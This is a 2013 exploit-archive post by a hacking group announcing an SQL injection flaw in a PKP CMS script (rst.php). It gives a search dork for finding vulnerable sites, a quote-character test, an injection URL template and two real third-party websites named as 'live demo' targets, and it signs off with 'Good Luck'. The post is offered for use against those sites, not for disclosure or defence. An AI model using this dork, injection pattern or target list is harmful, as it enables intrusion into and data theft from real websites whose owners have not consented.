facebook facebook twitter rss

pkp CMS SQL Injection Vulnerability

Author: Dead.Zone , Published: 25-01-2013
   010101010101010101010101010101010101010101010101010101010
0 0
1 Iranian Datacoders Security Team 2010 1
0 0
1 WWW.DataCoders.Org 1
010101010101010101010101010101010101010101010101010101010

############################################################################
# Exploit Title: pkp CMS SQL Injection Vulnerability #
# Date: 01/24/2013 #
# Author: Dead.Zone #
# Vendor Link: http://pkp.sfu.ca/ #
# Version : N/A #
# Platform / Tested on: php/linux #
# Dork: inurl:rst.php?id=20 & intext:developed by The Public Knowledge Project #
# Category: webapplications #
# Code : [SQL injection] #
# Our Website: http://www.datacoders.org #
############################################################################

you can use this Sting (') after website url for find bug in sql injection :)



example :
http://[PATH]/rst.php?id=[SQL]


Live demo :

http://www.sbpjor.org.br/ojs/rst/rst.php?op=view_metadata&id=20
http://www.amid.dk/ocs/rst.php?id=20&op=show_meta&cf=1

Good Luck


############################################################################################
# #
# We Are: H-SK33PY | Immortal Boy | Dead.Zone| Noter | Neda | M0ri , Rez0us^N!hasa , Agrab #
# #
# And All Iranian DataCoders Members #
# #
# Don't Forget WwW.DataCoders.Org #
############################################################################################

Like us on Facebook :